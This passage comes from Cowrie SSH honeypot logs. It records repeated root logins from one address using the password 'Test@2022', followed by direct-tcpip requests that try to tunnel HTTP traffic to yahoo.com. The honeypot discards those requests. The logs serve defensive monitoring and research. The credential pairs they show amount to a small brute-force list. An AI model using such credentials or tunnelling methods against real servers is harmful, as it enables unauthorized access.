56-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:47.850495Z","src_ip":"213.209.150.239","session":"17b07620c5d2"}
{"eventid":"cowrie.login.failed","username":"zx","password":"123","message":"login attempt [zx/123] failed","sensor":"my-vps","timestamp":"2025-08-26T01:00:47.952871Z","src_ip":"27.112.78.170","session":"b9fea2c190ff"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:48.133335Z","src_ip":"213.209.150.239","session":"17b07620c5d2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":20428,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:20428","sensor":"my-vps","timestamp":"2025-08-26T01:00:48.192430Z","session":"17b07620c5d2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:48.249211Z","src_ip":"213.209.150.239","session":"17b07620c5d2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":16812,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:16812","sensor":"my-vps","timestamp":"2025-08-26T01:00:48.403159Z","session":"17b07620c5d2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:48.459864Z","src_ip":"213.209.150.239","session":"17b07620c5d2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:48.517366Z","src_ip":"213.209.150.239","session":"17b07620c5d2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":10989,"dst_ip":"1.2.3.4","dst_port":22,"session":"79af231fb723","protocol":"ssh","message":"New connection: 213.209.150.239:10989 (1.2.3.4:22) [session: 79af231fb723]","sensor":"my-vps","timestamp":"2025-08-26T01:00:48.572720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:48.573466Z","src_ip":"213.209.150.239","session":"79af231fb723"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:48.630021Z","src_ip":"213.209.150.239","session":"79af231fb723"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:48.911737Z","src_ip":"213.209.150.239","session":"79af231fb723"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":7292,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:7292","sensor":"my-vps","timestamp":"2025-08-26T01:00:48.969275Z","session":"79af231fb723"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.026267Z","src_ip":"213.209.150.239","session":"79af231fb723"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":13183,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:13183","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.183195Z","session":"79af231fb723"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.212924Z","src_ip":"27.112.78.170","session":"b9fea2c190ff"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.240115Z","src_ip":"213.209.150.239","session":"79af231fb723"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.298158Z","src_ip":"213.209.150.239","session":"79af231fb723"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":11533,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e109dbf5ae9","protocol":"ssh","message":"New connection: 213.209.150.239:11533 (1.2.3.4:22) [session: 0e109dbf5ae9]","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.344752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.345745Z","src_ip":"213.209.150.239","session":"0e109dbf5ae9"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.392916Z","src_ip":"213.209.150.239","session":"0e109dbf5ae9"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.628377Z","src_ip":"213.209.150.239","session":"0e109dbf5ae9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":13971,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:13971","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.676833Z","session":"0e109dbf5ae9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.724543Z","src_ip":"213.209.150.239","session":"0e109dbf5ae9"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":19098,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:19098","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.861608Z","session":"0e109dbf5ae9"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.909721Z","src_ip":"213.209.150.239","session":"0e109dbf5ae9"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:49.957852Z","src_ip":"213.209.150.239","session":"0e109dbf5ae9"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":12085,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec420a1c7332","protocol":"ssh","message":"New connection: 213.209.150.239:12085 (1.2.3.4:22) [session: ec420a1c7332]","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.003961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.013704Z","src_ip":"213.209.150.239","session":"ec420a1c7332"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.051340Z","src_ip":"213.209.150.239","session":"ec420a1c7332"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.286240Z","src_ip":"213.209.150.239","session":"ec420a1c7332"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":563,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:563","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.334373Z","session":"ec420a1c7332"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.382334Z","src_ip":"213.209.150.239","session":"ec420a1c7332"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":8529,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:8529","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.517488Z","session":"ec420a1c7332"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.564746Z","src_ip":"213.209.150.239","session":"ec420a1c7332"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.612603Z","src_ip":"213.209.150.239","session":"ec420a1c7332"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":12659,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e19a7cabb8a","protocol":"ssh","message":"New connection: 213.209.150.239:12659 (1.2.3.4:22) [session: 2e19a7cabb8a]","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.658717Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.659455Z","src_ip":"213.209.150.239","session":"2e19a7cabb8a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.706623Z","src_ip":"213.209.150.239","session":"2e19a7cabb8a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.941869Z","src_ip":"213.209.150.239","session":"2e19a7cabb8a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":10863,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:10863","sensor":"my-vps","timestamp":"2025-08-26T01:00:50.989958Z","session":"2e19a7cabb8a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:51.037424Z","src_ip":"213.209.150.239","session":"2e19a7cabb8a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":27244,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:27244","sensor":"my-vps","timestamp":"2025-08-26T01:00:51.173490Z","session":"2e19a7cabb8a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:51.220659Z","src_ip":"213.209.150.239","session":"2e19a7cabb8a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:00:51.268505Z","src_ip":"213.209.150.239","session":"2e19a7cabb8a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":13047,"dst_ip":"1.2.3.4","dst_port":22,"session":"29acc134cf48","protocol":"ssh","message":"New connection: 213.209.150.239:13047 (1.2.3.4:22) [session: 29acc134cf48]","sensor":"my-vps","timestamp":"2025-08-26T01:00:51.324460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:00:51.325425Z","src_ip":"213.209.150.239","session":"29acc134cf48"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:00:51.382071Z","src_ip":"213.209.150.239","session":"29acc134cf48"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:00:51.664410Z","src_ip":"213.209.150.239","session":"29acc134cf48"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":8285,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:8285","sensor":"my-vps","timestamp":"2025-08-26T01:00:51.721992Z","session":"29acc134cf48"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:00:51.778787Z","src_ip":"213.209.150.239","session":"29acc134cf48"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":2261,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:2261","sensor":"my-vps","timestamp":"2025-08-26T01:00:51.935129Z","session":"29acc134cf48"}
